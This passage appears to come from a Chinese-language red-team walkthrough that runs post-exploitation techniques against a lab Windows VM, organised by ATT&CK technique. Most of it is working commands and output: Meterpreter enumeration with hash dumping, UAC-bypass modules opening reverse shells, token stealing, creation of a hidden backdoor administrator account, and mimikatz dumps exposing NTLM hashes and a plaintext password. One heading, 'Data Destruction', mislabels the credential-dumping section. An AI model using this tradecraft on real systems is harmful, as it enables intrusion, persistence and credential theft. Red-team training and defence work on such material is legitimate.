System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.2.114:1068...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/ROOT-5DE52AC98B_20190907.4112/ROOT-5DE52AC98B_20190907.4112.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/ROOT-5DE52AC98B_20190907.4112
[*] Checking if ROOT-5DE52AC98B is a Virtual Machine ........
[*] This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*] running command cmd.exe /c set
[*] running command ipconfig /displaydns
[*] running command arp -a
[*] running command netstat -nao
[*] running command netstat -vb
[*] running command route print
[*] running command netstat -ns
[*] running command ipconfig /all
[*] running command net view
[*] running command net accounts
[*] running command net view /domain
[*] running command net share
[*] running command net group
[*] running command net user
[*] running command net localgroup
[*] running command net localgroup administrators
[*] running command net group administrators
[*] running command netsh firewall show config
[*] running command tasklist /svc
[*] running command net session
[*] running command gpresult /SCOPE COMPUTER /Z
[*] running command gpresult /SCOPE USER /Z
[*] Running WMIC Commands ....
[*] running command wmic group list
[*] running command wmic nteventlog get path,filename,writeable
[*] running command wmic useraccount list
[*] running command wmic netclient list brief
[*] running command wmic share get name,path
[*] running command wmic volume list brief
[*] running command wmic logicaldisk get description,filesystem,name,size
[*] running command wmic service list brief
[*] running command wmic netlogin get name,lastlogon,badpasswordcount
[*] running command wmic netuse get name,username,connectiontype,localname
[*] running command wmic rdtoggle list
[*] running command wmic startup list full
[*] running command wmic qfe
[*] running command wmic product get name,version
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!

cs下操作:

shell systeminfo

(认证枚举)Account Discovery

Gather more information on targeted users(收集更多的目标用户信息)

terminal下操作:

net user [username] [/domain]

C:\Users\Administrator\Desktop\powrshell>net user administrator
用户名 Administrator
全名
注释 管理计算机(域)的内置帐户
用户的注释
国家/地区代码 000 (系统默认值)
帐户启用 Yes
帐户到期 从不
上次设置密码 2019-7-14 23:28:47
密码到期 从不
密码可更改 2019-7-14 23:28:47
需要密码 Yes
用户可以更改密码 Yes
允许的工作站 All
登录脚本
用户配置文件
主目录
上次登录 2019-9-7 10:08:43
可允许的登录小时数 All
本地组成员 *Administrators
全局组成员 *None
命令成功完成。

msf下操作:

post/windows/gather/enum_ad_users

auxiliary/scanner/smb/smb_enumusers

msf5 post(windows/gather/enum_ad_users) > exploit
[-] Unable to find the domain to query.
[*] Post module execution completed

Query Active Directory for users, groups and permissions(查询Active Directory中的用户、组和权限)

terminal下操作:

dsquery group "ou=Domain Admins,dc=domain,dc=com"
dsquery user "dc=domain,dc=com"
dsquery * OU="Domain Admins",DC=domain,DC=com -scope base -attr SAMAccountName userPrincipalName Description
dsquery * -filter "(&(objectCategory=contact)(objectCategory=person)(mail=*)(objectClass=user))" -Attr samAccountName mail -Limit 0
dsquery * -filter "(&(objectCategory=group)(name=*Admin*))" -Attr name description members

(bypass UAC)Bypass User Account Control

bypass UAC

msf下操作:

exploit/windows/local/bypassuac

exploit/windows/local/bypassuac_injection

exploit/windows/local/bypassuac_vbs

msf5 exploit(windows/local/bypassuac) > exploit
[*] Started reverse TCP handler on 192.168.2.103:4444
[-] Exploit aborted due to failure: none: Already in elevated state
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_injection) > exploit
[*] Started reverse TCP handler on 192.168.2.103:4444
[-] Exploit aborted due to failure: none: Already in elevated state
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/bypassuac_vbs) > exploit
[*] Started reverse TCP handler on 192.168.2.103:4444
[-] Exploit aborted due to failure: none: Already in elevated state
[*] Exploit completed, but no session was created.

cs下操作:

access --> elevate

beacon> elevate uac-dll test
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.2.103:6666) in a high integrity process
[+] host called home, sent: 101435 bytes
[+] received output:
[*] Wrote hijack DLL to 'C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\9970.dll'
[-] Privileged file copy failed: C:\WINDOWS\System32\sysprep\CRYPTBASE.dll
beacon> elevate uac-eventvwr test
[*] Tasked Beacon to run windows/beacon_http/reverse_http (192.168.2.103:6666) in a high integrity context
[+] host called home, sent: 2798 bytes
[+] host called home, sent: 2498 bytes
[+] host called home, sent: 125001 bytes
[-] could not spawn C:\WINDOWS\system32\rundll32.exe (token): 1349
[-] Could not connect to pipe: 2
beacon> elevate uac-token-duplication test
[+] host called home, sent: 3545 bytes
[*] Tasked beacon to spawn windows/beacon_http/reverse_http (192.168.2.103:6666) in a high integrity process (token duplication)
[+] host called home, sent: 79378 bytes
[+] received output:
[-] You're already in a high integrity context.
beacon> elevate uac-wscript test
[*] Tasked Beacon to run windows/beacon_http/reverse_http (192.168.2.103:6666) in a high integrity context
[+] host called home, sent: 2802 bytes
[+] host called home, sent: 128999 bytes
[-] could not spawn C:\WINDOWS\system32\rundll32.exe (token): 1349
[-] Could not connect to pipe: 2

(访问令牌操作)Access Token Manipulation

原理:

Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
简单来说就是攻击者可以使用访问令牌在不同的用户或系统安全上下文中操作,以执行操作和逃避检测。攻击者可以使用内置的Windows API函数从现有进程复制访问令牌;这就是所谓的令牌窃取
常用方法:
` 令牌模拟/盗窃
` 使用令牌创建进程
` Make和Impersonate令牌
注:任何标准用户都可以使用runas命令和Windows API函数创建模拟令牌;它不需要访问管理员帐户

Token stealing(令牌窃取)

msf下操作:

use incognito
list_tokens -u
impersonate_token DOMAIN\\User
or:
steal_token {pid}
meterpreter > use incognito
Loading extension incognito...Success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
ROOT-5DE52AC98B\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

cs下操作:

steal_token pid

beacon> steal_token 1228
[*] Tasked beacon to steal token from PID 1228
[+] host called home, sent: 12 bytes

(网络共享发现)Network Share Discovery

Dump network shared resource information(输出网络共享资源信息)

terminal下操作:

net share

C:\Users\Administrator\Desktop\powrshell>net share
共享名 资源 注解
-------------------------------------------------------------------------------
C$ C:\ 默认共享
D$ D:\ 默认共享
IPC$ 远程 IPC
ADMIN$ C:\Windows 远程管理
命令成功完成。

msf下操作:

auxiliary/scanner/smb/smb_enumshares

msf5 auxiliary(scanner/smb/smb_enumshares) > exploit
[-] 192.168.2.114:139 - Login Failed: Unable to Negotiate with remote host
[*] 192.168.2.114: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

cs下操作:

shell net share

List of workstations and network devices(工作组和网络设备列表)

terminal下操作:

net view \host /all [/domain:domain]

C:\Users\Administrator\Desktop\powrshell>net view /all
发生系统错误 6118。
此工作组的服务器列表当前无法使用

msf下操作:

auxiliary/scanner/smb/smb_enumshares

cs下操作:

net view \host /domain

(创建认证)Create Account

Create backdoor user account(创建后门用户帐户)

terminal下操作:

net user support_388945a0 somepasswordhere /add /y
net localgroup administrators support_388945a0 /add
net localgroup "remote desktop users" support_388945a0 /add
C:\Users\Administrator\Desktop\powrshell>net user support_388945a0 somepasswordhere /add /y
命令成功完成。
C:\Users\Administrator\Desktop\powrshell>net localgroup administrators support_388945a0 /add
命令成功完成。
C:\Users\Administrator\Desktop\powrshell>net localgroup "remote desktop users"
别名 remote desktop users
注释 此组中的成员被授予远程登录的权限
成员
-------------------------------------------------------------------------------
命令成功完成。
C:\Users\Administrator\Desktop\powrshell>support_388945a0 /add
'support_388945a0' 不是内部或外部命令,也不是可运行的程序
或批处理文件。
C:\Users\Administrator\Desktop\powrshell>net user
\\DESKTOP-QQF0MLN 的用户帐户
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
support_388945a0 WDAGUtilityAccount
命令成功完成。

msf下操作:

post/windows/manage/add_user_domain

msf5 post(windows/manage/add_user_domain) > exploit
[*] Running module on ROOT-5DE52AC98B
[-] This host is not part of a domain.
[*] Post module execution completed

cs下操作:

shell net user support_388945a0 somepasswordhere /add /y
shell net localgroup administrators support_388945a0 /add
shell net localgroup "remote desktop users" support_388945a0 /add

Enable "support_388945a0" account(启用“support_388945a0”账户)

terminal下操作:

net user support_388945a0 /active:yes
net localgroup administrators support_388945a0 /add
net localgroup "remote desktop users" support_388945a0 /add

cs下操作:

shell net user support_388945a0 /active:yes
shell net localgroup administrators support_388945a0 /add
shell net localgroup "remote desktop users" support_388945a0 /add

(数据销毁)Data Destruction

Dump credentials from LSASS(从LSASS转储凭据)

cs下操作:

mimikatz !sekurlsa::logonpasswords
mimikatz !sekurlsa::msv
mimikatz !sekurlsa::kerberos
mimikatz !sekurlsa::wdigest
beacon> mimikatz !sekurlsa::logonpasswords
[*] Tasked beacon to run mimikatz's !sekurlsa::logonpasswords command
[+] host called home, sent: 841299 bytes
[+] received output:
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019-9-7 10:11:34
SID : S-1-5-20
msv :
[00000002] Primary
* Username : ROOT-5DE52AC98B$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : ROOT-5DE52AC98B$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : root-5de52ac98b$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 333357 (00000000:0005162d)
Session : Interactive from 0
User Name : Administrator
Domain : ROOT-5DE52AC98B
Logon Server : ROOT-5DE52AC98B
Logon Time : 2019-9-7 10:15:25
SID : S-1-5-21-1911985068-4225083820-4011728908-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : ROOT-5DE52AC98B
* LM : 44efce164ab921caaad3b435b51404ee
* NTLM : 32ed87bdb5fdc5e9cba88547376818d4
* SHA1 : 6ed5833cf35286ebf8662b7b5949f0d742bbec3f
wdigest :
* Username : Administrator
* Domain : ROOT-5DE52AC98B
* Password : 123456
kerberos :
* Username : Administrator
* Domain : ROOT-5DE52AC98B
* Password : 123456
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019-9-7 10:11:34
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 53191 (00000000:0000cfc7)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2019-9-7 10:11:34
SID :
msv :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : ROOT-5DE52AC98B$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2019-9-7 10:11:34
SID : S-1-5-18
msv :
wdigest :
kerberos :
* Username : root-5de52ac98b$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
beacon> mimikatz !sekurlsa::msv
[*] Tasked beacon to run mimikatz's !sekurlsa::msv command
[+] host called home, sent: 841288 bytes
[+] received output:
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2019-9-7 10:11:34
SID : S-1-5-20
msv :
[00000002] Primary
* Username : ROOT-5DE52AC98B$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
Authentication Id : 0 ; 333357 (00000000:0005162d)
Session : Interactive from 0